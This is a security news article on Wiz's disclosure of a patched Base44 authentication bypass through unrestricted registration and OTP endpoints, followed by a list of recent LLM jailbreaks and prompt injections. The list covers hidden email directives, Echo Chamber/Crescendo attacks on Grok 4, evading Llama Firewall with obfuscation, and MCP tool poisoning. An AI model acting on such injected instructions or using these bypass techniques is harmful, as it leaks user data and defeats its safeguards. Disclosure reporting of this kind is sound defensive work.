Wiz Uncovers Critical Access Bypass Flaw in AI-Powered Vibe Coding Platform Base44
Cybersecurity researchers have disclosed a now-patched critical security flaw in a popular vibe coding platform called Base44 that could allow unauthorized access to private applications built by its users.
“The vulnerability we discovered was remarkably simple to exploit — by providing only a non-secret app_id value to undocumented registration and email verification endpoints, an attacker could have created a verified account for private applications on their platform,” cloud security firm Wiz said in a report shared with The Hacker News.
A net result of this issue is that it bypasses all authentication controls, including Single Sign-On (SSO) protections, granting full access to all the private applications and data contained within them.
Following responsible disclosure on July 9, 2025, an official fix was rolled out by Wix, which owns Base44, within 24 hours. There is no evidence that the issue was ever maliciously exploited in the wild.
While vibe coding is an artificial intelligence (AI)-powered approach designed to generate code for applications by simply providing as input a text prompt, the latest findings highlight an emerging attack surface, thanks to the popularity of AI tools in enterprise environments, that may not be adequately addressed by traditional security paradigms.
The shortcoming unearthed by Wiz in Base44 concerns a misconfiguration that left two authentication-related endpoints exposed without any restrictions, thereby permitting anyone to register for private applications using only an “app_id” value as input –
- api/apps/{app_id}/auth/register, which is used to register a new user by providing an email address and password
- api/apps/{app_id}/auth/verify-otp, which is used to verify the user by providing a one-time password (OTP)
As it turns out, the “app_id” value is not a secret and is visible in the app’s URL and in its manifest.json file path. This also meant that it’s possible to use a target application’s “app_id” to not only register a new account but also verify the email address using OTP, thereby gaining access to an application that they didn’t own in the first place.

“After confirming our email address, we could just login via the SSO within the application page, and successfully bypass the authentication,” security researcher Gal Nagli said. “This vulnerability meant that private applications hosted on Base44 could be accessed without authorization.”
The development comes as security researchers have shown that state-of-the-art large language models (LLMs) and generative AI (GenAI) tools can be jailbroken or subjected to prompt injection attacks and make them behave in unintended ways, breaking free of their ethical or safety guardrails to produce malicious responses, synthetic content, or hallucinations, and, in some cases, even abandon correct answers when presented with false counterarguments, posing risks to multi-turn AI systems.
Some of the attacks that have been documented in recent weeks include –
- A “toxic” combination of improper validation of context files, prompt injection, and misleading user experience (UX) in Gemini CLI that could lead to silent execution of malicious commands when inspecting untrusted code.
- Using a special crafted email hosted in Gmail to trigger code execution through Claude Desktop by tricking Claude to rewrite the message such that it can bypass restrictions imposed on it.
- Jailbreaking xAI’s Grok 4 model using Echo Chamber and Crescendo to circumvent the model’s safety systems and elicit harmful responses without providing any explicit malicious input. The LLM has also been found leaking restricted data and abiding hostile instructions in over 99% of prompt injection attempts absent any hardened system prompt.
- Coercing OpenAI ChatGPT into disclosing valid Windows product keys via a guessing game
- Exploiting Google Gemini for Workspace to generate an email summary that looks legitimate but includes malicious instructions or warnings that direct users to phishing sites by embedding a hidden directive in the message body using HTML and CSS trickery.
- Bypassing Meta’s Llama Firewall to defeat prompt injection safeguards using prompts that used languages other than English or simple obfuscation techniques like leetspeak and invisible Unicode characters.
- Deceiving browser agents into revealing sensitive information such as credentials via prompt injections attacks.
“The AI development landscape is evolving at unprecedented speed,” Nagli said. “Building security into the foundation of these platforms, not as an afterthought – is essential for realizing their transformative potential while protecting enterprise data.”

The disclosure comes as Invariant Labs, the research division of Snyk, detailed toxic flow analysis (TFA) as a way to harden agentic systems against Model Control Protocol (MCP) exploits like rug pulls and tool poisoning attacks.
“Instead of focusing on just prompt-level security, toxic flow analysis pre-emptively predicts the risk of attacks in an AI system by constructing potential attack scenarios leveraging deep understanding of an AI system’s capabilities and potential for misconfiguration,” the company said.
Furthermore, the MCP ecosystem has introduced traditional security risks, with as many as 1,862 MCP servers exposed to the internet sans any authentication or access controls, putting them at risk of data theft, command execution, and abuse of the victim’s resources, racking up cloud bills.
“Attackers may find and extract OAuth tokens, API keys, and database credentials stored on the server, granting them access to all the other services the AI is connected to,” Knostic said.
Source link